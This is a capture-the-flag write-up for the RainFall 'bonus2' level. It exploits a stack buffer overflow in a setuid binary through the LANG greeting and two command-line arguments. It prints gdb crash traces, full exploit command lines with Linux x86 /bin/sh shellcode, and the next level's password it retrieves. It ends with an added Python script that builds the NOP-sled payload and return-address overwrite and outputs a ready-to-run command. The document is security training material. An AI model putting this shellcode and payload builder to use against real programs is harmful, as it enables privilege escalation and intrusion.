Using Ghidra we notice that the LANG environment variable is read: it can be fi, nl, or anything else, which falls back to English. The program then calls a greeting function that uses both command-line arguments. We'll set LANG=nl for now.
Fiddling a bit we can make the program segfault, and we can make it crash at an address of our choosing: only the first 40 bytes of argv[1] are used (40 A's are printed back), and after 23 bytes of argv[2] the next four bytes overwrite the saved return address, so EIP becomes 0x58585858, our XXXX:
Starting program: /home/user/bonus2/bonus2 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAAAA aaaaaaaaaaaaaaaaaaaaaaaXXXX
Goedemiddag! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaaaaaaaaaaaaaaaaaaaaaXXXX
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb)
Let's try to put shellcode after the X's.
We find argv on the stack at address 0xbffff8c0.
Our X's are at address 0xbffff919, so let's put the shellcode at 0xbffff920. That leaves 3 filler bytes between the return address and the shellcode.
This produces strange behaviour but doesn't give a shell. The likely cause: appending the shellcode makes argv[2] much longer, which pushes the argument strings further down the stack, so an address measured with the short argument no longer points at the shellcode (and the stack of a process started under gdb differs from one started by the shell anyway).
bonus2@RainFall:~$ LANG=nl /home/user/bonus2/bonus2 `python -c "print('A'*40)"` `python -c "print('a'*23+'\x20\xf9\xff\xbf'+'a'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')"`
bonus2@RainFall:~$
Let's try putting the shellcode in the first argument instead, behind a 100-byte NOP sled so the return address only has to land somewhere in the sled. The address 0xbffff8e0 points into the original argv[1] string in the argument area (near the 0xbffff8c0 we found above), not into the truncated 40-byte copy the program prints back:
bonus2@RainFall:~$ LANG=nl /home/user/bonus2/bonus2 `python -c "print('\x90'*100+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')"` `python -c "print('a'*23+'\xe0\xf8\xff\xbf')"`
Goedemiddag! [40 NOP bytes (0x90) shown as unprintable characters]aaaaaaaaaaaaaaaaaaaaaaa[4 address bytes]
$ whoami
bonus3
$ cat /home/user/bonus3/.pass
71d449df0f960b36e0055eb58c14d0f5d0ddc0b35328d657f91cf0df15910587
:)
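The steps above, collected into a small payload builder. This is an added example, not part of the original writeup: it reuses the page's own shellcode and the offsets the crash revealed (40 bytes of argv[1] used, 23 bytes of argv[2] before the saved return address, 0xbffff8e0 as the target with LANG=nl) and adds two checks a practitioner wants before running anything: locating the crashing EIP value inside the pattern that was sent, and refusing a payload that contains a NUL byte, since argv entries are C strings and a 0x00 byte truncates them. The function names, the `shell_command` helper and its bash `$'...'` quoting are my additions, not something the page shows.

```python
import struct

# Shellcode copied from the page's command line (46 bytes, Linux x86):
# setreuid(0, 0) via int 0x80, then execve("/bin/sh", ["/bin/sh"], NULL).
# setreuid(0, 0) fails harmlessly for a non-root process; the shell keeps the setuid euid.
SHELLCODE = (
    b"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"      # xor eax,eax; mov al,70; xor ebx,ebx; xor ecx,ecx; int 0x80
    b"\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08"  # jmp short; pop ebx; xor eax,eax; mov [ebx+7],al; mov [ebx+8],ebx
    b"\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c"  # mov [ebx+12],eax; mov al,11; lea ecx,[ebx+8]; lea edx,[ebx+12]
    b"\xcd\x80\xe8\xe5\xff\xff\xff"                  # int 0x80; call back to the pop ebx (pushes &"/bin/sh")
    b"/bin/sh"
)

GREETING_NL = b"Goedemiddag! "   # prefix printed when LANG=nl (13 bytes)
ARG1_USED = 40                   # only the first 40 bytes of argv[1] reach the greeting
ARG2_TO_EIP = 23                 # bytes of argv[2] that precede the saved return address


def eip_offset_in_pattern(pattern: bytes, crash_eip: int) -> int:
    """Locate the crashing EIP value inside the pattern fed in argv[2].
    Returns -1 when the register value did not come from the pattern."""
    return pattern.find(struct.pack("<I", crash_eip))


def eip_offset_from_greeting(greeting: bytes = GREETING_NL) -> int:
    """Distance from the start of the greeting string to the saved return address."""
    return len(greeting) + ARG1_USED + ARG2_TO_EIP


def build_arg1(sled_len: int = 100, shellcode: bytes = SHELLCODE) -> bytes:
    """argv[1]: NOP sled followed by the shellcode. The program only copies 40 bytes,
    but the return address points at the original string in the argv area, so the
    whole payload is what ends up executing."""
    return b"\x90" * sled_len + shellcode


def build_arg2(ret_addr: int) -> bytes:
    """argv[2]: filler up to the saved return address, then the address little-endian."""
    return b"a" * ARG2_TO_EIP + struct.pack("<I", ret_addr)


def argv_is_usable(*args: bytes) -> bool:
    """argv strings are NUL-terminated C strings: any 0x00 byte truncates the payload."""
    return all(b"\x00" not in a for a in args)


def build_payload(ret_addr: int, sled_len: int = 100) -> list:
    """Both arguments, checked for embedded NUL bytes (e.g. 0xbffff800 would be unusable)."""
    arg1, arg2 = build_arg1(sled_len), build_arg2(ret_addr)
    if not argv_is_usable(arg1, arg2):
        raise ValueError("payload contains a NUL byte; pick another return address or sled length")
    return [arg1, arg2]


def shell_command(ret_addr: int, sled_len: int = 100,
                  binary: str = "/home/user/bonus2/bonus2") -> str:
    """Render a bash command equivalent to the page's python -c invocation (my helper)."""
    arg1, arg2 = build_payload(ret_addr, sled_len)

    def quote(b: bytes) -> str:
        # bash ANSI-C quoting; every byte is spelled out so nothing is mangled by the shell
        return "$'" + "".join("\\x%02x" % c for c in b) + "'"

    return "LANG=nl %s %s %s" % (binary, quote(arg1), quote(arg2))


if __name__ == "__main__":
    print("crash offset in argv[2]:", eip_offset_in_pattern(b"a" * 23 + b"XXXX", 0x58585858))
    print("offset from greeting start:", eip_offset_from_greeting())
    print(shell_command(0xbffff8e0))
```

The 100-byte NOP sled is what makes 0xbffff8e0 tolerant of the address shifts between a gdb session and a plain shell start (different environment, different argument lengths): as long as the return address lands anywhere in the sled, execution slides into the shellcode. Note that 13 + 40 + 23 = 76 bytes of greeting precede the saved return address, which is why a 40-byte argv[1] alone never reaches it and the overflow has to come from argv[2].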